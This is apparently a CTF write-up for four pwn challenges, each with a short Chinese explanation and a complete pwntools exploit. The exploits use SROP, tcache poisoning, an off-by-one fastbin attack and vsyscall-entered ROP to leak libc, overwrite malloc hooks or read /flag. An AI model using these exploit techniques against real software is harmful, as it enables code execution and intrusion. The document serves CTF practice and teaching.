1.babybabypwn

  • SROP 再构造 ROP 链，没啥好说。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

# `Q=1` on the command line selects the remote instance; otherwise the
# local binary is started.
if args.Q:
	io = remote('node3.buuoj.cn', 29793)
else:
	io = process('./vn_pwn_babybabypwn_1')
# pwn() takes puts/read/open/write/__malloc_hook offsets from this build.
libc = ELF('./libc-2.23.so')


# Short names for the tube operations used by leak()/pwn().
def sla(a, b):
	"""Wait for marker a, then send b plus a newline."""
	return io.sendlineafter(a, b)


def sa(a, b):
	"""Wait for marker a, then send b unchanged."""
	return io.sendafter(a, b)


def sl(a):
	"""Send a plus a newline."""
	return io.sendline(a)


def ru(a):
	"""Receive up to and including a."""
	return io.recvuntil(a)


def rv(a):
	"""Receive at most a bytes."""
	return io.recv(a)


def ia():
	"""Hand the connection to the user."""
	return io.interactive()
def leak():
	"""Return the address the target prints after 'gift: ' as an int.

	The value is consumed as 14 characters ('0x' plus 12 hex digits);
	pwn() rebases libc from it as the address of puts.
	"""
	io.recvuntil('gift: ')
	hex_text = io.recv(14)
	puts_leak = int(hex_text, 16)
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
	
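def pwn(leak):
	"""SROP into read(), then a ROP chain that opens and prints /flag.

	leak: puts address from leak(); everything is rebased against the
	bundled libc-2.23, whose gadget offsets (0x21102/0x202e8/0x1b92) and
	symbols are the author's values for that build.
	Stage 1: the sigreturn frame resumes in read(0, __malloc_hook, 0x200)
	with rsp already set to __malloc_hook, so the bytes that read receives
	become the stack and the next return address. __malloc_hook serves only
	as writable scratch space here, not as a hook.
	Stage 2: the chain delivered by that read:
	  read(0, hook-8, 8)           <- the '/flag' line sent below
	  open(hook-8, 0, 0)           fd presumably 3
	  read(3, hook-0x40, 0x40)
	  write(0, hook-0x40, <rdx>)   rdx is left at 0x40; fd 0 works when
	                                stdin and stdout are the same socket
	Side effects: sends three messages and prints up to 0x40 received bytes.
	"""
	libc_base=leak-libc.sym['puts']
	pop_rdi=libc_base+0x0000000000021102
	pop_rsi=libc_base+0x00000000000202e8
	pop_rdx=libc_base+0x0000000000001b92
	read_addr=libc_base+libc.sym['read']
	open_addr=libc_base+libc.sym['open']
	write_addr=libc_base+libc.sym['write']
	malloc_hook=libc_base+libc.sym['__malloc_hook']
	log.success('read_addr==>{}'.format(hex(read_addr)))

	frame = SigreturnFrame()
	frame.rdi = 0
	frame.rsi = malloc_hook
	frame.rdx = 0x200
	frame.rsp = malloc_hook
	frame.rip = read_addr
	# The first qword of the frame is dropped - presumably the target already
	# supplies it ahead of the message body; kept as the author had it.
	payload =str(frame)[0x8:]
	sla('message: ',payload)
	#gdb.attach(io,'b read')
	#pause()
	payload =p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(malloc_hook-8)+p64(pop_rdx)+p64(8)+p64(read_addr)
	payload+=p64(pop_rdi)+p64(malloc_hook-8)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open_addr)
	payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(malloc_hook-0x40)+p64(pop_rdx)+p64(0x40)+p64(read_addr)
	payload+=p64(pop_rdi)+p64(0)+p64(write_addr)
	sl(payload)
	sl('/flag\x00')
	# The chain writes 0x40 bytes; receiving only 0x10 truncated the output.
	print(rv(0x40))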
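if __name__=='__main__':
	# Keep the leaked address in its own name so leak (the function) is not
	# rebound to an int; a second call would otherwise fail.
	puts_leak=leak()
	pwn(puts_leak)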

2.easyHeap

  • 由于题目的限制,只能在tcache范围内操作,所以我们可以改tcache头。具体操作如下。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
# `Q=1` on the command line selects the remote instance; otherwise the
# local binary is started with the libc-2.27 build whose symbols pwn() uses.
if args.Q:
	io = remote('node3.buuoj.cn', 26022)
else:
	io = process(['./vn_pwn_easyTHeap'], env={"LD_PRELOAD":"/home/dingjie/libs/2.27-3ubuntu1_amd64/libc-2.27.so"})
libc = ELF('/home/dingjie/libs/2.27-3ubuntu1_amd64/libc-2.27.so')


# Short names for the tube operations used by the menu helpers below.
def sla(a, b):
	"""Wait for marker a, then send b plus a newline."""
	return io.sendlineafter(a, b)


def sl(a, b):
	"""Also sendafter, despite the name; duplicates sa and is not used below."""
	return io.sendafter(a, b)


def ru(a):
	"""Receive up to and including a."""
	return io.recvuntil(a)


def rv(a):
	"""Receive at most a bytes."""
	return io.recv(a)


def ia():
	"""Hand the connection to the user."""
	return io.interactive()


def sa(a, b):
	"""Wait for marker a, then send b unchanged."""
	return io.sendafter(a, b)
def add(size):
	"""Menu option 1: request a chunk of `size` bytes (sent in decimal)."""
	io.sendlineafter('choice: ', '1')
	io.sendlineafter('size?', str(size))
def edit(idx,content):
	"""Menu option 2: write `content` (raw, no newline) into slot `idx`."""
	io.sendlineafter('choice: ', '2')
	io.sendlineafter('idx?', str(idx))
	io.sendafter('content:', content)
def show(idx):
	"""Menu option 3: have the target print slot `idx`."""
	io.sendlineafter('choice: ', '3')
	io.sendlineafter('idx?', str(idx))
def dele(idx):
	"""Menu option 4: free slot `idx`."""
	io.sendlineafter('choice: ', '4')
	io.sendlineafter('idx?', str(idx))
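def leak():
	"""Leak a libc pointer through the tcache; return the raw leaked address.

	Sequence (the trailing comments are the author's slot numbers):
	  1. slot 0 is freed twice and shown; the printed heap pointer is
	     page-aligned to find the tcache struct;
	  2. the chunk's next pointer is redirected to tcache_struct+0x10, so the
	     third 0x80 allocation lands on the tcache struct itself;
	  3. the struct's counts are edited and slot 0 freed once more; show(0)
	     then prints a libc address (recognised by its 0x7f top byte).
	Relies on the loaded libc-2.27 build accepting the double free; the
	offsets and the 0x07 count are the author's values for that build.
	Side effects: drives the target's menu and logs both leaks.
	"""
	add(0x80)#0
	dele(0)
	dele(0)
	show(0)
	# Exactly 6 bytes are expected (the significant bytes of a heap pointer);
	# recvn waits for all of them instead of accepting a short read, which
	# recv(6) would silently zero-extend into a wrong address.
	tcache_leak=u64(io.recvn(6).ljust(8,'\x00'))
	tcache_struct=tcache_leak-(tcache_leak&0xfff)  # clear the low 12 bits: page base
	log.success('tcache_struct==>{}'.format(hex(tcache_struct)))
	add(0x80)#1, same chunk as slot 0
	edit(1,p64(tcache_struct+0x10))  # its next pointer -> tcache struct user area
	add(0x80)#2, same chunk again
	add(0x80)#3, the tcache struct
	edit(3,p64(0x0700000000000000))  # presumably counts[7] = 7 for the 0x90 bin - confirm
	add(0x90)#4

	dele(0)  # with that count set, this free presumably skips the tcache - confirm
	show(0)
	# Last 6 bytes up to and including the 0x7f byte, zero-extended to 8.
	leak=u64(ru('\x7f')[-6:].ljust(8,'\x00'))
	log.success('leak==>{}'.format(hex(leak)))
	return leak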
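def pwn(leak):
	"""Point the tcache's 0x90 entry at __realloc_hook and overwrite the hooks.

	leak: libc pointer from leak(); __malloc_hook = leak-0x70 and the
	one_gadget offset 0x4f322 are the author's values for the bundled
	libc-2.27 build.
	edit(3) rewrites the tcache struct: 8 bytes of counts (counts[7]=7),
	14 zero qwords (rest of the counts plus entries[0..6]) and then, at
	offset 0x78, presumably entries[7] = __realloc_hook. The next add(0x80)
	therefore returns __realloc_hook, and edit(5) stores 0 there and
	one_gadget over __malloc_hook, so the following malloc runs the gadget.
	Side effects: drives the menu, then hands the session to the user.
	"""
	malloc_hook=leak-0x70
	realloc_hook=malloc_hook-8
	one_gadget=malloc_hook-libc.sym['__malloc_hook']+0x4f322
	edit(3,p64(0x0700000000000000)+p64(0)*14+p64(realloc_hook))
	add(0x80)#5, this is __realloc_hook
	edit(5,p64(0)+p64(one_gadget))
	# NOTE(review): the menu choice below followed by add(0x60) is kept as the
	# author had it; it appears to rely on the 1 s timeout so that the second
	# '1' is taken as the size prompt's answer, which triggers malloc.
	sla('choice: ','1')
	#gdb.attach(io)
	#pause()
	add(0x60)
	ia()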
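if __name__=='__main__':
	# Keep the leaked address in its own name so leak (the function) is not
	# rebound to an int; a second call would otherwise fail.
	leaked_addr=leak()
	pwn(leaked_addr)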

3.simpleHeap

  • 简单的off-by-one。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# `Q=1` on the command line selects the remote instance; otherwise the
# local binary is started.
if args.Q:
	io = remote('node3.buuoj.cn', 25471)
else:
	io = process(['./vn_pwn_simpleHeap'])
# pwn() takes the __malloc_hook and realloc offsets from this libc.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


# Short names for the tube operations used by the menu helpers below.
def sla(a, b):
	"""Wait for marker a, then send b plus a newline."""
	return io.sendlineafter(a, b)


def sa(a, b):
	"""Wait for marker a, then send b unchanged."""
	return io.sendafter(a, b)


def ru(a):
	"""Receive up to and including a."""
	return io.recvuntil(a)


def rv():
	"""Receive whatever is available."""
	return io.recv()


def ia():
	"""Hand the connection to the user."""
	return io.interactive()

def add(size,content):
	"""Menu option 1: request `size` bytes and fill the slot with `content` (raw)."""
	io.sendlineafter('choice: ', '1')
	io.sendlineafter('size?', str(size))
	io.sendafter('content:', content)
def edit(idx,content):
	"""Menu option 2: write `content` (raw, no newline) into slot `idx`."""
	io.sendlineafter('choice: ', '2')
	io.sendlineafter('idx?', str(idx))
	io.sendafter('content:', content)
def show(idx):
	"""Menu option 3: have the target print slot `idx`."""
	io.sendlineafter('choice: ', '3')
	io.sendlineafter('idx?', str(idx))
def dele(idx):
	"""Menu option 4: free slot `idx`."""
	io.sendlineafter('choice: ', '4')
	io.sendlineafter('idx?', str(idx))
def leak():
	"""Leak a libc address through the off-by-one and return the author's base value.

	Slots 0, 2 and 3 are 0x20 chunks and slot 1 is 0x70; 0x70 + 0x20 = 0x90
	is exactly the size written over slot 1's header, so freeing slot 1 hands
	the allocator a chunk covering slots 1 and 2. The two allocations that
	follow carve it up again, and show(1) then presumably prints past the
	'aaaaaaaa' marker into bytes holding a libc pointer (0x7f top byte).
	-216 is the author's adjustment for the libc in use; pwn() treats the
	result as 0x10 above __malloc_hook.
	Side effects: drives the target's menu and logs the value.
	"""
	add(0x18,'a')#0
	add(0x68,'a')#1
	add(0x18,'a')#2
	add(0x18,'a')#3
	# 0x18 bytes fill slot 0; the overflow (the write-up's off-by-one) reaches
	# slot 1's size field and sets it to 0x91.
	edit(0,'\x00'*0x18+p64(0x91))
	dele(1)
	add(0x18,'aaaaaaaa')#1
	add(0x60,'a')#4
	show(1)
	ru('aaaaaaaa')
	# First 6 bytes after the marker (up to the 0x7f byte), zero-extended to 8.
	leak=u64(ru('\x7f')[:6].ljust(8,'\x00'))-216
	log.success('leak==>{}'.format(hex(leak)))
	return leak
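def pwn(leak):
	"""Fastbin attack that places a chunk over __malloc_hook, then one_gadget.

	leak: value from leak(); the author treats __malloc_hook as leak-0x10 and
	derives libc_base from it. 0x4526a is the one_gadget offset for the
	libc-2.23 build in use; realloc+14 is the author's entry into realloc
	(presumably chosen so the gadget's stack constraint holds).
	Layout, as far as the page shows: slot 6 carries a fake 0x71 size field
	0x18 bytes into its data; the overflow from slot 3 turns slot 5's size
	into 0x41 (presumably slot 5 follows slot 3 on the heap); after freeing
	both, the 0x40 chunk handed back as slot 5 reaches slot 6's header and
	its fd is pointed at __malloc_hook-35. That fake chunk's user area
	(+0x10) plus 11 zero bytes lines up with __realloc_hook (-8), and the
	next qword with __malloc_hook.
	Side effects: drives the menu, then hands the session to the user.
	"""
	malloc_hook=leak-0x10
	log.success('malloc_hook==>{}'.format(hex(malloc_hook)))
	# Same value as leak-0x10-libc.sym[...]; derived from malloc_hook so the
	# two stay in step if the offset above is ever changed.
	libc_base=malloc_hook-libc.sym['__malloc_hook']
	log.success('libc_base==>{}'.format(hex(libc_base)))
	one_gadget=libc_base+0x4526a
	realloc=libc_base+libc.sym['realloc']
	log.success('realloc==>{}'.format(hex(realloc)))
	add(0x18,'a')#5
	add(0x68,p64(0)*3+p64(0x71))#6, fake size field at data+0x18
	edit(3,'\x00'*0x18+p64(0x41))  # overflow from slot 3: next chunk's size -> 0x41
	dele(6)
	dele(5)
	add(0x30,'a')#5, now a 0x40 chunk
	# 0x10 filler, prev_size 0, size 0x71, then slot 6's fd -> fake chunk.
	edit(5,'a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-35))
	add(0x68,'a')#6
	add(0x68,'a')#fake_chunk
	# 11 zero bytes, then __realloc_hook = one_gadget and __malloc_hook =
	# realloc+14 (-35 + 0x10 + 11 = -8). Author's sequence of three adds kept.
	add(0x68,'\x00'*11+p64(one_gadget)+p64(realloc+14))
	#gdb.attach(io)
	#pause()
	# Any allocation now goes through the overwritten hooks.
	sla('choice: ','1')
	sla('size?','1')
	ia()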
	
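if __name__=='__main__':
	# Keep the leaked address in its own name so leak (the function) is not
	# rebound to an int; a second call would otherwise fail.
	leaked_addr=leak()
	pwn(leaked_addr)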

4.warmup

  • 这里利用 vsyscall 固定段来接栈；又由于开了沙箱，所以用 ROP 读 flag。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` on the command line selects the remote instance; otherwise the
# local binary is started.
if args.Q:
	io = remote('node3.buuoj.cn', 28989)
else:
	io = process('./vn_pwn_warmup')
# pwn() takes puts/read/open/write/__malloc_hook offsets from this build.
libc = ELF('./libc-2.23.so')


# Short names for the tube operations used by leak()/pwn().
def sla(a, b):
	"""Wait for marker a, then send b plus a newline."""
	return io.sendlineafter(a, b)


def sa(a, b):
	"""Wait for marker a, then send b unchanged."""
	return io.sendafter(a, b)


def sl(a):
	"""Send a plus a newline."""
	return io.sendline(a)


def ru(a):
	"""Receive up to and including a."""
	return io.recvuntil(a)


def rv(a):
	"""Receive at most a bytes."""
	return io.recv(a)


def ia():
	"""Hand the connection to the user."""
	return io.interactive()
def leak():
	"""Return the address printed after 'gift: ' as an int.

	14 characters are consumed ('0x' plus 12 hex digits); pwn() uses the
	value as the address of puts to rebase libc.
	"""
	io.recvuntil('gift: ')
	puts_leak = int(io.recv(14), 16)
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
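def pwn(leak):
	"""ROP chain (read/open/read/write on /flag) entered through vsyscall.

	leak: puts address from leak(); rebased against the bundled libc-2.23,
	whose gadget offsets (0x21102/0x202e8/0x1b92) are the author's values.
	The chain is sent first as the answer to 'something: '; the 'name?'
	answer overflows 0x78 bytes and returns into 0xffffffffff600000, the
	vsyscall page, which the write-up uses as a fixed-address step into the
	chain. __malloc_hook serves only as a writable scratch buffer:
	  read(0, buf, 8)        <- the 8-byte path line sent below
	  open(buf, 0, 0)        fd presumably 3
	  read(3, buf, 0x40)
	  write(1, buf, <rdx>)   rdx is left at 0x40 from the previous pop
	Side effects: sends three messages and hands the session to the user.
	"""
	libc_base=leak-libc.sym['puts']
	log.success('libc_base==>{}'.format(hex(libc_base)))
	pop_rdi=libc_base+0x0000000000021102
	pop_rsi=libc_base+0x00000000000202e8
	pop_rdx=libc_base+0x0000000000001b92
	read_addr=libc_base+libc.sym['read']
	open_addr=libc_base+libc.sym['open']
	write_addr=libc_base+libc.sym['write']
	malloc_hook=libc_base+libc.sym['__malloc_hook']
	payload =p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(malloc_hook)
	payload+=p64(pop_rdx)+p64(8)+p64(read_addr)+p64(pop_rdi)
	payload+=p64(malloc_hook)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open_addr)
	payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(malloc_hook)+p64(pop_rdx)+p64(0x40)+p64(read_addr)
	payload+=p64(pop_rdi)+p64(1)+p64(write_addr)
	sla('something: ',payload)
	payload='a'*0x78+p64(0xffffffffff600000)
	sa('name?',payload)
	# 6 path bytes + 2 terminators, plus the newline: exactly the 8 bytes read above.
	sl('/flag\x00\x00')
	# interactive() returns None; printing it only added a stray "None".
	ia()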
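if __name__=='__main__':
	# Keep the leaked address in its own name so leak (the function) is not
	# rebound to an int; a second call would otherwise fail.
	puts_leak=leak()
	pwn(puts_leak)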